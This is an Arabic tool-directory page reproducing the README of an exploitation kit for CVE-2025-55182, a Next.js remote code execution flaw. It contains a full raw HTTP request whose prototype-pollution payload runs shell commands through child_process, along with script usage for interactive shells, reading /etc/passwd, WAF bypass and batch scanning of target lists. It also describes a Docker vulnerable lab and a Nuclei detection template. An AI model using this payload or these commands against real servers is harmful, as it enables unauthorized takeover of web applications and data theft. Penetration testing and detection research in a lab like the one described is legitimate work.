Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell-exploit — React2Shell-Exploit — إطار استغلال كامل لـ CVE-2025-55182، يتضمن استغلال بايثون، مختبر ضعيف لـ Docker، استغلال يدوي وآلي عبر Burp Suite، قالب كشف عبر Nuclei، وسير عمل اختبار معتمد. تم تطويره لاختبار الاختراق والبحث التعليمي. | Kitploit
أدوات/GitHubGitHub/rubensuxo-eh/react2shell-exploit
ماسحات الثغرات الأمنيةأطر الاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubrubensuxo-eh/react2shell-exploit

react2shell-exploit

React2Shell-Exploit — إطار استغلال كامل لـ CVE-2025-55182، يتضمن استغلال بايثون، مختبر ضعيف لـ Docker، استغلال يدوي وآلي عبر Burp Suite، قالب كشف عبر Nuclei، وسير عمل اختبار معتمد. تم تطويره لاختبار الاختراق والبحث التعليمي.

عرض المستودع
4115منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🐺 React2Shell-Exploit-Kensei

CVE-2025-55182 - Next.js RCE (تنفيذ الأكواد عن بُعد)

إطار عمل استغلال + مختبر ضعيف + التحقق عبر Burp Suite و Nuclei.

إطار استغلال كامل وبيئة مختبر ضعيفة لأبحاث الأمان واختبار الاختراق.

╔═══════════════════════════════════════════════════════════════╗
║              🐺 React2Shell-Exploit-Kensei 🐺                 ║
║              CVE-2025-55182 Exploitation Tool                 ║
║                                                               ║
║  Author: Ruben Suxo - Ethical Hacker (kensei)    v2.5.0      ║
╚═══════════════════════════════════════════════════════════════╝

🎯 نظرة عامة

React2Shell-Exploit-Kensei هي مجموعة أدوات شاملة لاستغلال CVE-2025-55182، وهي ثغرة حرجة لتنفيذ الأكواد عن بُعد في تطبيقات Next.js.

وتشمل:

  • 🐍 استغلال بايثون (وضع تلقائي + يدوي)
  • 🐳 مختبر ضعيف في Docker (Next.js 16.0.6)
  • 🔥 قوالب استغلال Burp Suite
  • 🚨 قالب كشف Nuclei
  • 🧪 حالات اختبار مُتحقق منها

الإصدارات المتأثرة:

  • Next.js < 16.0.7
  • React 19.0.0

درجة CVSS: 10.0 (حرجة)

✨ الميزات

🔨 الاستغلال

✅ استغلال تلقائي ✅ شل تفاعلي ✅ تنفيذ الأوامر ✅ قراءة الملفات ✅ تجاوز WAF ✅ مسح دفعي

🧪 تثبيت بيئة المختبر عبر Docker - المتطلبات الأساسية

يجب أن يكون Docker مثبتًا لتشغيل المختبر الضعيف.

المنصةرابط التثبيت
Windowshttps://docs.docker.com/desktop/install/windows/
macOShttps://docs.docker.com/desktop/install/mac-install/
Linuxhttps://docs.docker.com/engine/install/

تحقق من التثبيت:

docker --version

📖 التوثيق

✅ دليل Burp Suite ✅ قالب Nuclei ✅ أمثلة كاملة


🚀 بداية سريعة

# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py

# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab

# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"

💻 أمثلة الاستخدام

مسح

python3 react2shell-exploit.py --url http://target.com --scan

تنفيذ أمر

python3 react2shell-exploit.py --url http://target.com --cmd "id"

شل تفاعلي

python3 react2shell-exploit.py --url http://target.com --shell

قراءة ملف

python3 react2shell-exploit.py --url http://target.com --read /etc/passwd

تجاوز WAF

python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass

مسح دفعي

python3 react2shell-exploit.py --list targets.txt --scan --threads 20

🔍 الاستغلال اليدوي

Burp Suite

تم التحقق من العمل - قالب الطلب:

POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

الاستجابة المتوقعة:

"children":["__PAGE__?{\"out\":\"root\"}",{}]

اختبار WHOAMI يدويًا: لقطة شاشتي

اختبار IFCONFIG يدويًا: لقطة شاشتي

طرق الكشف التلقائي البديلة:

  • ✅ إضافة مساعد الامتدادات:
    1. اذهب إلى الامتدادات:
    2. ثبّت "Extensibility Helper" واذهب إليه

لقطة شاشتي

  1. اذهب إلى "متجر Bambda"
  2. ابحث عن "CVE-2025-55182,CVE-2025-66478 - React2Shell"

لقطة شاشتي

  1. انقر على "استيراد"

لقطة شاشتي

  1. تشغيل "تدقيق العناصر المحددة"

لقطة شاشتي

لقطة شاشتي

لقطة شاشتي

  1. تحقق في علامة التبويب المخصصة أن "CVE-2025-55182,CVE-2025-66478 - React2Shell" محدد لقطة شاشتي
  • ✅ ActiveScan++: كشف تلقائي

لقطة شاشتي

Nuclei

تم التحقق من العمل:

nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml

المخرجات:

[CVE-2025-55182] [http] [critical] http://target.com:3002/

لقطة شاشتي

🐺 الاعتمادات

المؤلف: Ruben Suxo - هاكر أخلاقي (kensei) الإصدار: 2.5.0 التاريخ: 2025-12-06

البحث والإلهام

يعتمد هذا المشروع على الأبحاث والتقنيات من:

  • assetnote/react2shell-scanner - تنفيذ الماسح
  • freeqaz/react2shell - تقنيات الاستغلال
  • whiteov3rflow/CVE-2025-55182-poc - إثبات المفهوم

اكتشاف الثغرة

  • Lachlan Davidson (@lachlan2k) - الاكتشاف الأصلي لـ CVE-2025-55182

⚠️ إخلاء مسؤولية قانوني

لاختبارات الأمان المصرح بها فقط.

الوصول غير المصرح به غير قانوني. استخدم فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.


📄 الترخيص

رخصة MIT


🐺 اخترق الكوكب - بمسؤولية

لأغراض تعليمية فقط. استخدمه أخلاقيًا.

تنزيل الأداة